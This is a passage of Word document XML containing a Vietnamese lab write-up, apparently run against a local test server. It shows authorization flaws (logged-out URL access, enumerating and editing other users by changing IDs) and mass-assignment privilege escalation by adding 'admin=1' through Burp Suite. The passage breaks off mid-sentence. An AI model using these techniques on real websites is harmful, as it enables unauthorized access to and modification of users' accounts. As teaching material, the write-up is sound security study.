        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891442">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sau đó ta tiếp tục truy cập vào các link với ủy quyền cho phép.</w:t>
      </w:r>
      <w:r w:rsidR="00891442">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00891442">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo hãy nhìn trên thanh URL ta thấy được được dẫn đến link truy cập thứ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00891442">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2.Lý</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00891442">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> do ở đây ta thấy được đường dẫn link truy cập là do trang web sử dụng phương thức GET.Bây giờ ta tiến hành copy đường dẫn trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0040686A" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="008228FC" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId150" w:history="1">
        <w:r w:rsidR="004653AE" w:rsidRPr="00842459">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://192.168.111.142/authorization/example1/infos/1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F2507F" w14:textId="7E838C48" w:rsidR="004653AE" w:rsidRPr="00891442" w:rsidRDefault="00283404" w:rsidP="00891442">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="2D10F494">
          <v:shape id="Hình ảnh 130" o:spid="_x0000_i1160" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId151" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0806F581" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00891442" w:rsidRDefault="004653AE" w:rsidP="00891442">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891442">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sau đó khi ta đăng xuất khỏi trang web và tiến hành truy cập với URL ta không cần phải nhậpmật khẩu hay tài khoản mà vẫn có thể truy xuất đến thông tin của user trong trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E04FDCE" w14:textId="4A03A6AA" w:rsidR="004653AE" w:rsidRPr="00891442" w:rsidRDefault="00283404" w:rsidP="00891442">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="5E785938">
          <v:shape id="Hình ảnh 131" o:spid="_x0000_i1161" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId152" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70897431" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00891442" w:rsidRDefault="004653AE" w:rsidP="00891442">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891442">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kết quả là ta chỉ cần gõ đoạn URL ở một trình duyệt khác nó vẫn truy xuất đến thông tin người dùng hiện tại trên website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B6A05" w14:textId="253B63DA" w:rsidR="004653AE" w:rsidRPr="00891442" w:rsidRDefault="00283404" w:rsidP="00891442">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="58D2ACC8">
          <v:shape id="Hình ảnh 132" o:spid="_x0000_i1162" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId153" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F2326" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00891442" w:rsidRDefault="004653AE" w:rsidP="00891442">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891442">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD440C6" w14:textId="35245C47" w:rsidR="004653AE" w:rsidRPr="00891442" w:rsidRDefault="004653AE" w:rsidP="00891442">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891442">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Phần này đã giải quyết vấn đề trước đó, bạn đã không đăng nhập để truy cập thông tin, nhưng tôi đã không thực hiện đúng cách khiến các trang web bị khóa bởi giá trị cookie hoặc bất kỳ cách nào khác, vì vậy nếu tôi đăng nhập, tôi có thể truy cập bất kỳ tài khoản người dùng nào khác và thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03121E" w14:textId="4C56B32B" w:rsidR="00DB565D" w:rsidRDefault="00283404" w:rsidP="004E2AC2">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="10EB594D">
          <v:shape id="Hình ảnh 133" o:spid="_x0000_i1163" type="#_x0000_t75" style="width:423pt;height:192.75pt;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal-relative:margin;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin" o:allowoverlap="f">
            <v:imagedata r:id="rId154" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC5A8D8" w14:textId="1C132925" w:rsidR="004653AE" w:rsidRPr="00DB565D" w:rsidRDefault="004653AE" w:rsidP="00DB565D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Đầu tiền tôi đăng nhập vào website và truy cập đến user1 và user2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EB5A28" w14:textId="435B58F4" w:rsidR="004653AE" w:rsidRPr="00DB565D" w:rsidRDefault="004653AE" w:rsidP="00DB565D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trên thanh URL ta thấy rằng các user được đánh số thứ tự phía sao phần infos.</w:t>
      </w:r>
      <w:r w:rsidR="00DB565D" w:rsidRPr="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tôi tiến hành thử nghiệm đánh số 3 và 4 vào và kết quả thật bất ngờ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE9BC2" w14:textId="58139D0F"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C90BF9B">
          <v:shape id="Hình ảnh 134" o:spid="_x0000_i1164" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId155" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DA122E" w14:textId="793DC20A" w:rsidR="004653AE" w:rsidRPr="00DB565D" w:rsidRDefault="004653AE" w:rsidP="00DB565D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ta có thể truy xuất đến tất cả user của website bằng cách đánh số theo thứ tự từ bé đến lớn.</w:t>
      </w:r>
      <w:r w:rsidR="004E2AC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Đây là một trong những lỗi rất nguy hiểm của trang </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>web.Quản</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> trị viên đã không chú ý đến việc mã hóa dữ liệu đầu vào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F84B19" w14:textId="4EF4D999" w:rsidR="004653AE" w:rsidRPr="00DB565D" w:rsidRDefault="004653AE" w:rsidP="00DB565D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 3</w:t>
      </w:r>
      <w:r w:rsidR="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5765D67F" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00DB565D" w:rsidRDefault="004653AE" w:rsidP="00DB565D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB565D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Đây là sự lặp lại của bài tập trước, trong bài tập này, bạn không thể truy cập thông tin người dùng khác nhưng bạn có thể chỉnh sửa nó, chỉ cần truy cập trang chỉnh sửa của tài khoản user1 và thay đổi giá trị trong URL là bạn đã có thể truy xuất thông tin của các user khác thông qua edit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E2ACDC" w14:textId="3E43CAAD"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1A767BE">
          <v:shape id="Hình ảnh 135" o:spid="_x0000_i1165" type="#_x0000_t75" style="width:468pt;height:199.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId156" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0E7540" w14:textId="7DE91CAB"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645B2296">
          <v:shape id="Hình ảnh 136" o:spid="_x0000_i1166" type="#_x0000_t75" style="width:444.75pt;height:253.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId157" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B4DF81" w14:textId="6CF214B0"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Đây cũng là một lổ hỗng nguy hiểm của website.</w:t>
      </w:r>
      <w:r w:rsidR="00481852">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00481852">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Việc không mã hóa dữ liệu đầu vào khiến cho việc kẻ tấn công có thể khai thác và sữa đổi thông tin người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EF4E1B" w14:textId="48B9960D"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5F4BB12">
          <v:shape id="Hình ảnh 137" o:spid="_x0000_i1167" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId158" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C94070C" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00431F40" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00431F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>E.Mass</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00431F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-Assigment Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DF3BC4" w14:textId="77777777"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Khi mọi người bắt đầu xây dựng trang web với cơ sở dữ liệu để lưu trữ thông tin, họ phải làm rất nhiều SQL theo cách thủ công. Rất ít người nhận ra rằng đó không phải là giải pháp tốt nhất và bắt đầu nghiên cứu các giải pháp thay thế thông minh hơn và bắt đầu xây dựng Ánh xạ quan hệ đối tượng (ORM) để dễ dàng truy vấn cơ sở dữ liệu mà không cần bất kỳ kiến ​​thức SQL nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300490F7" w14:textId="77777777"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Thật không may, tính năng hữu ích này đi kèm với giá bảo mật, nếu nhà phát triển không đảm bảo chính xác rằng các thuộc tính của đối tượng @user được bảo vệ, kẻ tấn công có thể tùy ý ghi đè bất kỳ thuộc tính nào trong số này. Trong phần này, chúng ta sẽ thấy một số ví dụ phổ biến về các loại vấn đề này: Phân công hàng loạt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3A2780" w14:textId="77777777"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Example 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A362F" w14:textId="77777777"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Đây là một ví dụ về khai thác leo thang đặc quyền, về cơ bản có các loại tài khoản trong ví dụ này, người dùng thông thường và Quản trị viên, bạn có thể dễ dàng thao tác dữ liệu được gửi bằng Burpsuit để đăng ký mình làm Quản trị viên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CD9D5C" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00481852" w:rsidRDefault="004653AE" w:rsidP="00481852">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00481852">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Đầu tiền ta đăng nhập với một user và mật khẩu ngẫu </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00481852">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nhiên.Sao</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00481852">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> đó sử dụng Burpsuite để bắt gói tin đăng nhập.Tiếp theo ta tiến hành di duyển đến params và thêm một url có name là admin và value là 1.Cùng xem kết quả nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491ACF07" w14:textId="1388D7BB" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="00481852">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="03BA0CC7">
          <v:shape id="Hình ảnh 138" o:spid="_x0000_i1168" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId159" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24851C15"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Sau khi thay đổi thông tin ta được kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193119F" w14:textId="1F4A007C"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30037957">
          <v:shape id="Hình ảnh 139" o:spid="_x0000_i1169" type="#_x0000_t75" style="width:309.75pt;height:174pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId160" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2217B8E3" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031C91D1" w14:textId="77777777" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A12BEFC" w14:textId="08B35273" w:rsidR="004653AE" w:rsidRPr="007D0106" w:rsidRDefault="004653AE" w:rsidP="007D0106">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 2</w:t>
      </w:r>
      <w:r w:rsidR="007D0106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C35D55E" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="007D0106" w:rsidRDefault="004653AE" w:rsidP="007D0106">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong ví dụ 2, tôi không thể tạo tài khoản với đặc quyền quản trị </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D0106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nhưng  tôi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D0106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể cập nhật thông tin tài khoản và đặt nó làm quản trị viên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78473F73" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="007D0106" w:rsidRDefault="004653AE" w:rsidP="007D0106">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D0106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Chỉ cần tạo một tài khoản truy cập trang thông tin sửa đổi và sử dụng Burpsuit để thực hiện thủ thuật tương tự như trước đây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605A29D8" w14:textId="47E006F6"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1B50079">
          <v:shape id="Hình ảnh 140" o:spid="_x0000_i1170" type="#_x0000_t75" style="width:468pt;height:225.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId161" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E04221A"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Ta tiến hành modify your profile và sử dụng burpsuite như ví dụ 1 và ta có kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9D2917" w14:textId="449AC1C4"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474F346B">
          <v:shape id="Hình ảnh 141" o:spid="_x0000_i1171" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId162" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3E5C0E" w14:textId="26198D50"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350F46BD">
          <v:shape id="Hình ảnh 142" o:spid="_x0000_i1172" type="#_x0000_t75" style="width:468pt;height:263.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId163" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E52F0"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szCs w:val="20"/>
        </w:rPr>
        <w:t>Example 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A09076"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szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong bài tập này, chúng ta có thể truy cập thông tin của công ty 2 bằng cách sử dụng chức năng chỉnh sửa trên tài </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E44BF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>khoản.Bằng</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E44BF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cách sử dụng các kỹ năng ở bài tập 1 và 2 đã thực hiện ta sẽ sử dụng ở ví dụ 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D2DF74"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szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Đầu tiên sao khi đăng nhập vào company 1 ta tiến hành modify your profile của user 1 và sử dụng Burp suite để bắt gói tin truyền </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E44BF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>đi.Ta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E44BF6">
